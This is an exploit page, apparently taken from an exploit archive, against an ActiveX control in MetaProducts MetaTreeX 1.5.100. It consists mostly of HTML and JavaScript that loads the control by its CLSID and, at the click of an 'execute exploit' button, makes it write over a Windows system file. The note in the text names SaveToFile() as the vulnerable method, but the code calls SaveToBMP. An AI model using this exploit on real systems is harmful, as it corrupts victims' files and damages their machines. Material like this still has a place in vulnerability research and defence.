MetaProducts MetaTreeX V 1.5.100 ActiveX File Overwrite Exploit

<HTML> <BODY> <b> Author : Houssamix <br/> <br/> <br/> MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/> Note : SaveToFile() is vuln to <br/> <b/> <object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object> <SCRIPT> /* Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26} RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety: Vrai IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data */ function hehe() { File = "c:\\windows\\system_.ini" hsmx.SaveToBMP(File) } </SCRIPT> <input language=JavaScript onclick=hehe() type=button value="execute exploit"><br> </body> </HTML> # sebug.net